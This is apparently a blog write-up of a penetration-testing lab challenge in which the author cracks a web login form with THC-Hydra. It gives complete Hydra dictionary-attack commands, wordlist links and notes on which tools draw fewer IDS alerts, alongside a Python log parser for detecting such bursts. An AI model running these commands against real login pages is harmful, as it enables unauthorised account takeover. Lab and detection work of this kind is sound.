Recently I solved an easy challenge on one of the virtual penetration-testing labs.
It was a web application security challenge: there is a login form, and you have to guess the password. The login name is shown as the title of the login page :)
I decided to use THC-Hydra, the famous login cracker.
A simple example of using hydra:
hydra -l admin -P common_passwords.txt ftp://localhost/
You can find the passwords list here: https://github.com/danielmiessler/SecLists/tree/master/Passwords
or here: https://wiki.skullsecurity.org/Passwords
BTW, the password files have 'nocount' and 'withcount' in their names. A file with a count in its name also lists, for each password, how many times it occurred; this lets you take into account the try rate that the attacked server and its channel can sustain.
Since I was dealing with a web-based form, my attack was slightly different: there are additional URL parameters (POST attributes), and the response in case of success/failure is different (sometimes a failure response doesn't look like a failure response).
Here is the typical information needed for attacking a web-based form:
hydra -L users.txt -P pass.txt -t 10 -w 30 -o http-post-attack-result.txt localhost http-post-form "/path_to_page_with_porm.php:user=^USER^&pass=^PASS^:Bad login"
Host = localhost
Method = http-post-form
URL = /path_to_page_with_porm.php
Form parameters = user=^USER^&pass=^PASS^
Failure response = Bad login
Users file = users.txt
Password file = pass.txt
Threads = -t 10
Wait for timeout = -w 30
Output file = -o http-post-attack-result.txt
I took this brilliant explanation from this great post:
Using Hydra to dictionary-attack web-based login forms
I had to guess only the password, without the login, so I modified my attack command to the following:
hydra -l '' -P pass.txt localhost http-post-form "/path_to_page_with_porm.php:pass=^PASS^:F=Bad login" -t 10 -w 30 -o http-post-attack-result.txt
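From the defending side, a run like this leaves a very recognisable pattern in the web server's access log. The following is an added example, not code from the original post: it parses combined-format access log lines and flags every source address that POSTs to the login page more than a threshold number of times within a sliding time window, and also records whether the request carried Hydra's default User-Agent string (a weak indicator, since it is easily changed). The log lines, addresses and the login path are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime

# Combined log format: ip ident user [timestamp] "METHOD path proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

def parse_line(line):
    """Parse one access log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec

def detect_form_bruteforce(log_text, login_path, window=60, threshold=10):
    """Return {ip: (max POSTs to login_path within any `window` seconds, hydra_ua_seen)}
    for every source address whose peak count reaches `threshold`."""
    posts, hydra_ua = defaultdict(list), defaultdict(bool)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] == login_path:
            posts[rec["ip"]].append(rec["ts"])
            if "(Hydra)" in rec["ua"]:          # Hydra's default User-Agent marker
                hydra_ua[rec["ip"]] = True
    hits = {}
    for ip, times in posts.items():
        times.sort()
        best, start = 0, 0
        for end in range(len(times)):           # sliding window over sorted timestamps
            while (times[end] - times[start]).total_seconds() > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            hits[ip] = (best, hydra_ua[ip])
    return hits

# Constructed sample: 12 login POSTs in 3 seconds from 10.0.0.5 with Hydra's default
# User-Agent, plus a single POST from a normal user.
LINE = '{ip} - - [12/Mar/2023:10:00:{sec:02d} +0000] "POST /path_to_page_with_porm.php HTTP/1.1" {st} 512 "-" "{ua}"'
SAMPLE_LOG = "\n".join(
    [LINE.format(ip="10.0.0.5", sec=i // 4, st=200, ua="Mozilla/5.0 (Hydra)") for i in range(12)]
    + [LINE.format(ip="192.168.1.20", sec=9, st=302, ua="Mozilla/5.0")]
)

if __name__ == "__main__":
    for ip, (n, ua) in detect_form_bruteforce(SAMPLE_LOG, "/path_to_page_with_porm.php").items():
        print(f"{ip}: {n} login POSTs within 60 s, Hydra User-Agent seen: {ua}")
```

Note that a failed login here still returns HTTP 200 (the page with "Bad login"), so the status code alone does not distinguish the attempts; the request rate to the login path is the signal.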
Also, an HTTP interceptor is always useful. For instance:
- OWASP ZAP - free, good for studying, but causes many alerts in Intrusion Detection Systems (IDS)
- Burp Suite - not free, more sophisticated and has more features, also quite quiet with respect to IDS
In the same way I can compare network scanners:
- Nikto - free, good for studying, causes IDS alerts
- nmap - free, easy to use and quiet (The Matrix, hello :))